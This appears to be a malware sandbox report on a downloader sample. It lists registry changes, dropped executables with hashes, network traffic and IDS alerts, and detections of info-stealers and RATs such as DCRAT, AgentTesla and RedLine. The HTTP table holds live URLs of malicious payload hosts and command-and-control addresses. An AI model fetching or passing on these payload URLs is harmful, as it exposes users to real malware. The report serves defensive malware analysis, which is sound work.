000000007700650073007400650072006E0070006C0061007900650072002E007200740066003E00200020000000210000000000000034003300360033003400360033003400360033003400360034003300360033003400360033003400360033003400360033002E006500780065003E00200020000000010000000000000002000100000000000000000001000000000000000200010000000000000000001100000006000000010000001600000000000000000000000000000000000000803F0000004008000000803F0000404009000000803F000080400A000000803F0000A0400B0000000040000000000C00000000400000803F0D0000000040000000400E0000000040000040400F0000000040000080401000000000400000A040110000004040000000001200000040400000803F130000004040000000401400000000000000803F0100000000000000004002000000000000004040030000000000000080400400000000000000A04005000000803F0000000006000000803F0000803F070000004040000040401500
(PID) Process:	(4552) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop
Operation:	write	Name:	IconNameVersion
Value: 1
(PID) Process:	(4552) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive\Accounts
Operation:	write	Name:	LastUpdate
Value: 4EADC76600000000
(PID) Process:	(4552) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0
Operation:	write	Name:	CheckSetting
Value: 23004100430042006C006F0062000000000000000000000001000000FFFFFFFFFFFF0000
(PID) Process:	(6732) 4363463463464363463463463.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
Operation:	write	Name:	EnableConsoleTracing
Value: 0
(PID) Process:	(6732) 4363463463464363463463463.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\4363463463464363463463463_RASAPI32
Operation:	write	Name:	EnableFileTracing
Value: 0
(PID) Process:	(6732) 4363463463464363463463463.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\4363463463464363463463463_RASAPI32
Operation:	write	Name:	EnableAutoFileTracing
Value: 0
(PID) Process:	(6732) 4363463463464363463463463.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\4363463463464363463463463_RASAPI32
Operation:	write	Name:	EnableConsoleTracing
Value: 0
(PID) Process:	(6732) 4363463463464363463463463.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\4363463463464363463463463_RASAPI32
Operation:	write	Name:	FileTracingMask
Value:
(PID) Process:	(6732) 4363463463464363463463463.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\4363463463464363463463463_RASAPI32
Operation:	write	Name:	ConsoleTracingMask
Value:

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
6932	anticheat.exe	C:\Users\Public\Desktop\Google Chrome.lnk		lnk
		MD5:BE0F6E574127D7FFA7539F0C862BF8C1	SHA256:9BB43669741962052FBD438637B8C2827A91CC7D8044CE3869090860E3ADDD6F
6932	anticheat.exe	C:\Users\Public\Desktop\Microsoft Edge.lnk		lnk
		MD5:B5B1C756B73978D2DDE2F895F1007F2A	SHA256:7AAD92562A4E9A2D368490442CE75A2793AC0033D0B39C8EF466724863A3B27F
6732	4363463463464363463463463.exe	C:\Users\admin\Desktop\Files\dmshell.exe		executable
		MD5:A62ABDEB777A8C23CA724E7A2AF2DBAA	SHA256:84BDE93F884B8308546980EB551DA6D2B8BC8D4B8F163469A39CCFD2F9374049
4552	explorer.exe	C:\Users\admin\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat		binary
		MD5:E49C56350AEDF784BFE00E444B879672	SHA256:A8BD235303668981563DFB5AAE338CB802817C4060E2C199B7C84901D57B7E1E
6476	pei.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\newtpp[1].exe		executable
		MD5:BE9388B42333B3D4E163B0ACE699897B	SHA256:D281E0A0F1E1073F2D290A7EB1F77BED4C210DBF83A0F4F4E22073F50FAA843F
6732	4363463463464363463463463.exe	C:\Users\admin\Desktop\Files\aaa.exe		executable
		MD5:1318FBC69B729539376CB6C9AC3CEE4C	SHA256:E972FB08A4DCDE8D09372F78FE67BA283618288432CDB7D33015FC80613CB408
6932	anticheat.exe	C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1693682860-607145093-2874071422-1001\76b53b3ec448f7ccdda2063b15d2bfc3_bb926e54-e3ca-40fd-ae90-2764341e7792		dbf
		MD5:BBC8DA7D36DF3F91C460984C2ABE8419	SHA256:0399CCF5E780949A63400736A46CCE7D1879903D0F45C6B7D194C960BA4DDDC2
6732	4363463463464363463463463.exe	C:\Users\admin\Desktop\Files\tt.exe		executable
		MD5:ABABCA6D12D96E8DD2F1D7114B406FAE	SHA256:A992920E64A64763F3DD8C2A431A0F5E56E5B3782A1496DE92BC80EE71CCA5BA
4552	explorer.exe	C:\Users\admin\Desktop\Files\Downdd.exe		executable
		MD5:C2B59AF47AF63068FBA9F72206AA477D	SHA256:68B64E2C7EE3665B60678B698B59EF3953A974D77622E50FC1F806E62D568C5D
6476	pei.exe	C:\Users\admin\AppData\Local\Temp\1804925973.exe		executable
		MD5:BE9388B42333B3D4E163B0ACE699897B	SHA256:D281E0A0F1E1073F2D290A7EB1F77BED4C210DBF83A0F4F4E22073F50FAA843F

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

377

DNS requests

Threats

144

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
6732	4363463463464363463463463.exe	GET	200	185.215.113.16:80	http://185.215.113.16/inc/anticheat.exe	unknown	—	—	unknown
6732	4363463463464363463463463.exe	GET	200	58.23.215.156:8765	http://58.23.215.156:8765/Downdd.exe	unknown	—	—	unknown
5940	svchost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
6732	4363463463464363463463463.exe	GET	200	185.215.113.84:80	http://yzcplsibdtq.tsrv1.ws/pei.exe	unknown	—	—	malicious
6732	4363463463464363463463463.exe	GET	200	185.216.214.225:80	http://185.216.214.225/freedom.exe	unknown	—	—	malicious
6732	4363463463464363463463463.exe	GET	200	172.105.66.118:80	http://172.105.66.118/payloads/dmshell.exe	unknown	—	—	unknown
6732	4363463463464363463463463.exe	GET	200	185.215.113.84:80	http://72ec8d09-fce8-4272-9829-f4a17ae33269.random.tsrv1.ws/r.exe	unknown	—	—	malicious
6732	4363463463464363463463463.exe	GET	200	185.215.113.66:80	http://skyjsihnqew.fihsifuiiusuiuduf.com/tdrpload.exe	unknown	—	—	malicious
6732	4363463463464363463463463.exe	GET	200	185.215.113.84:80	http://blog.tsrv1.ws/aaa.exe	unknown	—	—	malicious
6732	4363463463464363463463463.exe	GET	200	185.215.113.66:80	http://privacy.aefiabeuodbauobfafoebbf.net/npp.exe	unknown	—	—	malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4436	RUXIMICS.exe	40.127.240.158:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	unknown
2120	MoUsoCoreWorker.exe	40.127.240.158:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	unknown
3412	svchost.exe	40.127.240.158:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	unknown
4	System	192.168.100.255:138	—	—	—	whitelisted
6732	4363463463464363463463463.exe	151.101.2.49:443	urlhaus.abuse.ch	FASTLY	US	unknown
6732	4363463463464363463463463.exe	185.215.113.16:80	—	1337team Limited	SC	malicious
6732	4363463463464363463463463.exe	58.23.215.156:8765	—	CHINA UNICOM China169 Backbone	CN	malicious
6932	anticheat.exe	38.180.203.208:14238	—	COGENT-174	US	malicious
3412	svchost.exe	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4	System	192.168.100.255:137	—	—	—	whitelisted

DNS requests

Domain	IP	Reputation
settings-win.data.microsoft.com	40.127.240.158 51.104.136.2	whitelisted
google.com	142.250.186.78	whitelisted
urlhaus.abuse.ch	151.101.2.49 151.101.66.49 151.101.130.49 151.101.194.49	whitelisted
client.wns.windows.com	40.113.103.199	whitelisted
login.live.com	40.126.31.67 20.190.159.0 40.126.31.71 20.190.159.2 40.126.31.69 20.190.159.73 20.190.159.75 20.190.159.23	whitelisted
ocsp.digicert.com	192.229.221.95	whitelisted
yzcplsibdtq.tsrv1.ws	185.215.113.84	malicious
72ec8d09-fce8-4272-9829-f4a17ae33269.random.tsrv1.ws	185.215.113.84	malicious
skyjsihnqew.fihsifuiiusuiuduf.com	185.215.113.66	unknown
blog.tsrv1.ws	185.215.113.84	malicious

Threats

PID	Process	Class	Message
6732	4363463463464363463463463.exe	Potentially Bad Traffic	ET INFO Executable Download from dotted-quad Host
6732	4363463463464363463463463.exe	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP
6732	4363463463464363463463463.exe	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
6732	4363463463464363463463463.exe	Potentially Bad Traffic	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
6732	4363463463464363463463463.exe	Potentially Bad Traffic	ET INFO Executable Download from dotted-quad Host
6732	4363463463464363463463463.exe	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP
6732	4363463463464363463463463.exe	Potentially Bad Traffic	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
6732	4363463463464363463463463.exe	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
6732	4363463463464363463463463.exe	Potentially Bad Traffic	ET INFO Executable Download from dotted-quad Host
6732	4363463463464363463463463.exe	Potentially Bad Traffic	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

20 ETPRO signatures available at the full report

Add for printing

Process	Message
freedom.exe	CLR: Managed code called FailFast without specifying a reason.

General Info

4363463463464363463463463.exe

2A94F3960C58C6E70826495F76D00B85

E2A1A5641295F5EBF01A37AC1C170AC0814BB71A

2FCAD226B17131DA4274E1B9F8F31359BDD325C9568665F08FD1F6C5D06A23CE

192:2we8sGKE6MqyG7c20L7BIW12n/ePSmzkTInu8stYcFwVc03KY:9e8sGKfMqyGg20PKn/cRaInuptYcFwVY

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

DCRAT has been detected (YARA)

HAUSBOMBER has been detected (YARA)

Changes the autorun value in the registry

Attempt to connect to SMB server

Creates or modifies Windows services

Changes the Windows auto-update feature

Changes Security Center notification settings

Changes appearance of the Explorer extensions

PHORPIEX has been detected (SURICATA)

Adds path to the Windows Defender exclusion list

Actions looks like stealing of personal data

Steals credentials from Web Browsers

Scans artifacts that could help determine the target

Connects to the CnC server

Application was injected by another process

Runs injected code in another process

SMOKE has been detected (SURICATA)

NANOCORE has been detected (YARA)

XWORM has been detected (YARA)

PHORPIEX has been detected (YARA)

AGENTTESLA has been detected (YARA)

REDLINE has been detected (YARA)

SUSPICIOUS

Drops the executable file immediately after the start

Executable content was dropped or overwritten

Reads the date of Windows installation

Reads security settings of Internet Explorer

Adds/modifies Windows certificates

Connects to unusual port

The process creates files with name similar to system file names

Starts itself from another location

Potential Corporate Privacy Violation

Starts CMD.EXE for commands execution

Creates or modifies Windows services

Executes application which crashes

Script adds exclusion path to Windows Defender

Starts POWERSHELL.EXE for commands execution

Process drops legitimate windows executable

Starts a Microsoft application from unusual location

Checks Windows Trust Settings

Connects to the server without a host name

Process requests binary or script from the Internet

Searches for installed software

The process drops C-runtime libraries

Uses TIMEOUT.EXE to delay execution

Found regular expressions for crypto-addresses (YARA)

Checks for external IP

Connects to SMTP port

The process executes via Task Scheduler

The process drops Mozilla's DLL files

INFO

Reads security settings of Internet Explorer

Reads Environment values

Checks supported languages

Reads the computer name

Checks proxy server information

Reads the software policy settings

Reads the machine GUID from the registry

Disables trace logs

Process checks computer location settings

Creates files or folders in the user directory

Reads mouse settings

Create files in a temporary directory

Process checks whether UAC notifications are on

Creates files in the program directory

Reads Microsoft Office registry keys

Checks if a key exists in the options dictionary (POWERSHELL)

Script raised an exception (POWERSHELL)